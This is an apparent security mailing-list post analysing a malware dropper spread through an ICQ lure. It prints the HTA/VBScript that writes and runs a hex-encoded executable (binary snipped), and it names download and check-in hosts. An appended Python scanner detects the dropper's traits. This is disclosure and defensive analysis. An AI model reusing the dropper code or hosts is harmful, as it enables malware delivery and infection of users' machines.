From: security at astrobox.net (Michael Bemmerl)
Subject: New Virus?

Hi everybody!

Today I got an ICQ message from a user called "Monica" (just search on ICQ:
http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Monique&LastName=&NickName=Monica&Country=49).
In her details is a URL: http://www.rsngermany.com/my_foto.htm This is a fake
404 error page, because in the <head> tags there is a link to
http://www.rsngermany.com/dn2.hta :

[HTML]
[HEAD]
[TITLE]Windows Update[/TITLE]
[HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none"
BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no"
MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no"
SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/]
[SCRIPT LANGUAGE="VBScript"]
MyFile = "q.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "WScript.Sleep(50000)" & vbcrlf
TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" &
vbcrlf
TSO.write "szApplication = ""x.exe""" & vbcrlf
TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" &
vbcrlf
TSO.write "intLength = len(szBinary)" & vbcrlf
TSO.write "intPosition = 1" & vbcrlf
TSO.write "while intPosition [ intLength" & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "hFile.Write(Chr(char))" & vbcrlf
TSO.write "intPosition = intPosition+2" & vbcrlf
TSO.write "wend" & vbcrlf
TSO.write "hFile.Close" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
# Dim WshShell
# Set WshShell = CreateObject("WScript.Shell")
# WshShell.Run "q.vbs", 0, false
[/SCRIPT]
[script]window.close()[/script]
[/HEAD]
[/html]

The .hta creates a file named q.vbs. That creates and runs x.exe. Notice the
unset parameter szURL in q.vbs (I assume that you can specify where to
download the next files - empty could mean that the files are loaded from
the coded location: http://rsngermany.com). The x.exe is FSG-packed; you can
unpack it with Un-FSG! (just google for it). The file will download another
exe file, disguised as a jpg: http://www.rsngermany.com/3.jpg

I tested this exe with wine; it creates two files in the Windows directory:
msreg.exe and fghy.exe (again packed with FSG) and two in system32:
svchostc.exe and svchosts.exe. Maybe it creates some run entries in the
registry, but I couldn't test this. And it sends requests to various domains:

All requests end in 404 errors, except two (see end of list)
(replace * with d and f)

comdat.de/kreta/yif.php
www.dataforcecg.com/webvision/yi*.php
www.eurostretch.ru/yi*.php
www.hhc-online.de/home/links/pics/yi*.php
www.courie.ru/style/yi*.php
mucuc.h10.ru/forum/yi*.php
www.gran-pri.ru/yi*.php
www.mir-auto.ru/yi*.php
artesproduction.com/yif.php

comdat.de/kreta/yid.php  --> 301, redirection to comcat.de/kreta/zid.php
comdat.de/kreta/zid.php --> 200, just prints out your IP. Maybe the author
logs infected PCs
artesproduction.com/yid.php --> 200, again prints out the IP

The svchosts.exe has some HTTP response messages for errors 400, 502 and 503

I tested the files with NAV2003, latest definitions, no infection.

Any ideas what it could be?

Greetings,
Michael
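The dropper quoted above has a recognisable static shape: a hidden HTA window, a VBScript that writes a second script, a hex-to-bytes decode loop, and an "MZ"-prefixed hex literal that is written to an .exe and launched. The following is an added example (not part of the original post) of a small Python scanner that flags those traits in HTA/VBS text and recovers the embedded binary the same way the VBS loop does; the sample HTA text and the "three hits is suspicious" threshold are constructed for the example.

```python
import re

# Indicators taken from the dropper quoted in the post. Doubled quotes ("")
# are allowed because the VBS lines are nested inside TSO.write string literals.
INDICATORS = {
    "hidden_hta_window": r'WINDOWSTATE\s*=\s*"minimize"|SHOWINTASKBAR\s*=\s*"no"',
    "drops_vbs": r'CreateTextFile\s*\(\s*"?[^"\s)]*\.vbs',
    "drops_exe": r'"{1,2}[^"\s]*\.exe"{1,2}',
    "hex_decode_loop": r'Int\s*\(\s*"{1,2}&H"{1,2}\s*&\s*Mid\s*\(',
    "wscript_shell": r'CreateObject\s*\(\s*"{1,2}WScript\.Shell"{1,2}\s*\)',
    "self_closing_window": r'window\.close\s*\(\s*\)',
}
# A quoted hex literal that starts with 4D5A ("MZ", the PE/DOS header magic).
MZ_LITERAL = re.compile(r'"{1,2}(4D5A(?:[0-9A-Fa-f]{2})+)"{1,2}')


def scan_dropper(text: str) -> dict:
    """Return which indicators fire and the decoded embedded binary, if any."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    blob = None
    m = MZ_LITERAL.search(text)
    if m:
        # Same transformation the VBS loop performs with Int("&H" & Mid(s, i, 2)).
        blob = bytes.fromhex(m.group(1))
    return {"hits": hits, "embedded_pe": blob,
            "suspicious": len(hits) >= 3 or blob is not None}


# Constructed sample mirroring the structure of the posted dn2.hta; the hex
# literal is only the first 16 bytes of a standard DOS header, not a program.
SAMPLE_HTA = r'''<HTA:APPLICATION ID="Q" SHOWINTASKBAR="no" WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
Set TSO = FSO.CreateTextFile("q.vbs", True)
TSO.write "szBinary = szBinary & ""4D5A90000300000004000000FFFF0000"" & szZeroLine" & vbcrlf
TSO.write "szApplication = ""x.exe""" & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
</SCRIPT>
<script>window.close()</script>'''

BENIGN_PAGE = "<html><body>404 - Not Found</body></html>"  # constructed control

if __name__ == "__main__":
    print(scan_dropper(SAMPLE_HTA))
    print(scan_dropper(BENIGN_PAGE))
```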
